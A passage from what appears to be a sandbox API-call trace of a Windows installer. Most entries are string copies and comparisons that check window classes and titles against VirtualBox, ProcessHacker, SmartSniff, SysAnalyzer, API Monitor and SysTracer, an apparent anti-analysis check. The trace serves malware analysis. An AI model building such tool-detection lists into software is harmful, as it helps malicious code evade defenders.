(in: lpString1=0x40b018, lpString2="VBoxTrayToolWndClass", iMaxLength=1024 | out: lpString1="VBoxTrayToolWndClass") returned="VBoxTrayToolWndClass" [0158.594] lstrcmpiA (lpString1="tooltips_class32", lpString2="VBoxTrayToolWndClass") returned -1 [0158.594] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.594] lstrlenA (lpString="tooltips_class32") returned 16 [0158.594] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.594] lstrcpynA (in: lpString1=0x40b018, lpString2="VMSwitchUserControlClass", iMaxLength=1024 | out: lpString1="VMSwitchUserControlClass") returned="VMSwitchUserControlClass" [0158.594] lstrcmpiA (lpString1="tooltips_class32", lpString2="VMSwitchUserControlClass") returned -1 [0158.594] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.594] lstrlenA (lpString="tooltips_class32") returned 16 [0158.594] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.595] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessLasso_Notification_Class", iMaxLength=1024 | out: lpString1="ProcessLasso_Notification_Class") returned="ProcessLasso_Notification_Class" [0158.595] lstrcmpiA (lpString1="tooltips_class32", lpString2="ProcessLasso_Notification_Class") returned 1 [0158.595] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.595] lstrlenA (lpString="tooltips_class32") returned 16 [0158.595] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.595] lstrcpynA (in: 
lpString1=0x40b018, lpString2="SmartSniff", iMaxLength=1024 | out: lpString1="SmartSniff") returned="SmartSniff" [0158.595] lstrcmpiA (lpString1="tooltips_class32", lpString2="SmartSniff") returned 1 [0158.595] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.595] lstrlenA (lpString="tooltips_class32") returned 16 [0158.595] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.595] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessHacker", iMaxLength=1024 | out: lpString1="ProcessHacker") returned="ProcessHacker" [0158.595] lstrcmpiA (lpString1="tooltips_class32", lpString2="ProcessHacker") returned 1 [0158.595] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.595] lstrlenA (lpString="tooltips_class32") returned 16 [0158.595] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.595] lstrcpynA (in: lpString1=0x40b018, lpString2="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}", iMaxLength=1024 | out: lpString1="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}") returned="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}" [0158.595] lstrcmpiA (lpString1="tooltips_class32", lpString2="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}") returned 1 [0158.595] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.595] lstrlenA (lpString="tooltips_class32") returned 16 [0158.595] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.595] lstrcpynA (in: lpString1=0x40b018, lpString2="SysAnalyzer", iMaxLength=1024 | out: 
lpString1="SysAnalyzer") returned="SysAnalyzer" [0158.595] lstrcmpiA (lpString1="tooltips_class32", lpString2="SysAnalyzer") returned 1 [0158.595] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.595] lstrlenA (lpString="tooltips_class32") returned 16 [0158.595] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.595] lstrcpynA (in: lpString1=0x40b018, lpString2="VMSwitchUserControlClass", iMaxLength=1024 | out: lpString1="VMSwitchUserControlClass") returned="VMSwitchUserControlClass" [0158.595] lstrcmpiA (lpString1="tooltips_class32", lpString2="VMSwitchUserControlClass") returned -1 [0158.595] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.595] lstrlenA (lpString="tooltips_class32") returned 16 [0158.595] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.595] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessHacker", iMaxLength=1024 | out: lpString1="ProcessHacker") returned="ProcessHacker" [0158.595] lstrcmpiA (lpString1="tooltips_class32", lpString2="ProcessHacker") returned 1 [0158.595] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.595] lstrlenA (lpString="") returned 0 [0158.595] lstrcpynA (in: lpString1=0x40ac18, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.596] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.596] lstrcmpiA (lpString1="", lpString2="0") returned -1 [0158.596] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.596] lstrlenA (lpString="") returned 
0 [0158.596] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.596] lstrcpynA (in: lpString1=0x337684, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.596] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.596] lstrlenA (lpString="3399936") returned 7 [0158.596] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.596] lstrcpynA (in: lpString1=0x40a418, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.596] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.596] lstrcpynA (in: lpString1=0x337acc, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.596] lstrcpynA (in: lpString1=0x432800, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.596] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.596] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.596] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.596] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.596] lstrlenA (lpString="") returned 0 [0158.596] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.596] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.596] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.596] lstrcpynA (in: 
lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.596] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.596] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.597] lstrlenA (lpString="") returned 0 [0158.597] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.597] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.597] lstrlenA (lpString="") returned 0 [0158.597] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.597] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.597] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.597] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.597] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.597] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.597] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") 
returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.597] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.597] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.597] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.597] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.597] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.598] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.598] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.598] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.598] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.598] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.598] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.598] lstrcpynA (in: lpString1=0x341200, lpString2="", 
iMaxLength=1024 | out: lpString1="") returned="" [0158.598] lstrcpynA (in: lpString1=0x3401e0, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.598] lstrcpynA (in: lpString1=0x340df8, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.598] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.598] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.600] lstrcpynA (in: lpString1=0x3401e0, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.600] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.600] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.600] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.600] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.600] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.600] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.600] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.600] lstrlenA (lpString="0") returned 1 [0158.600] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.600] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.600] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.600] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.600] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", 
iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.600] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.601] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.601] lstrlenA (lpString="0") returned 1 [0158.601] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.601] lstrlenA (lpString="") returned 0 [0158.601] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.601] lstrcpynA (in: lpString1=0x337684, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.601] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.601] lstrlenA (lpString="3399936") returned 7 [0158.601] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.601] lstrcpynA (in: lpString1=0x40a418, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.601] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.601] lstrcpynA (in: lpString1=0x337acc, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.601] lstrcpynA (in: lpString1=0x432800, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.601] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.601] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.601] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.601] lstrcpynA (in: lpString1=0x42e3a0, 
lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.601] lstrlenA (lpString="") returned 0 [0158.601] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.601] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.601] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.601] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.601] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.601] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.601] lstrlenA (lpString="") returned 0 [0158.602] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.602] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.602] lstrlenA (lpString="") returned 0 [0158.602] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.602] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.602] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.602] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.602] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.602] lstrcpynA (in: lpString1=0x42e3a0, 
lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.602] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.602] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.602] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.602] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.602] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.603] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.603] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.603] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.603] lstrcpyA (in: 
lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.603] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.604] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.604] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.604] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.604] lstrcpynA (in: lpString1=0x341200, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.604] lstrcpynA (in: lpString1=0x340df8, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.604] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.604] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.604] lstrcpynA (in: lpString1=0x341200, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.604] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.604] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.604] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.604] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.604] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.604] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.605] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.605] lstrlenA (lpString="0") returned 1 [0158.605] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") 
returned="0" [0158.605] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.605] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.605] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.605] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.605] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.605] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.605] lstrlenA (lpString="0") returned 1 [0158.605] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.605] lstrlenA (lpString="") returned 0 [0158.605] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.605] lstrcpynA (in: lpString1=0x337684, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.605] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.605] lstrlenA (lpString="3399936") returned 7 [0158.605] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.605] lstrcpynA (in: lpString1=0x40a418, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.605] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.605] lstrcpynA (in: lpString1=0x337acc, lpString2="Blue Project Software SysTracer", 
iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.605] lstrcpynA (in: lpString1=0x432800, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.605] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.605] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.605] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.605] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.605] lstrlenA (lpString="") returned 0 [0158.605] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.605] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.606] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.606] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.606] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.606] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.606] lstrlenA (lpString="") returned 0 [0158.606] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.606] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.606] lstrlenA (lpString="") returned 0 [0158.606] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.606] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", 
iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.606] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.606] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.606] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.606] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.606] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.606] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.606] lstrcpynA (in: lpString1=0x33835c, 